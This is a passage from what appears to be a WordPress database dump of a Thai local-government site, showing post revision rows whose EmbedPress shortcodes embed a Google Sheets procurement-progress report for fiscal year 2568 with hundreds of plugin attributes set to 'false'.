embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:29:25','2025-07-01 07:29:25','',1558,'http://pakhaeng.ssk.in.th/?p=1569',0,'revision','',0),
(1570,1,'2025-07-01 14:29:25','2025-07-01 07:29:25','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' 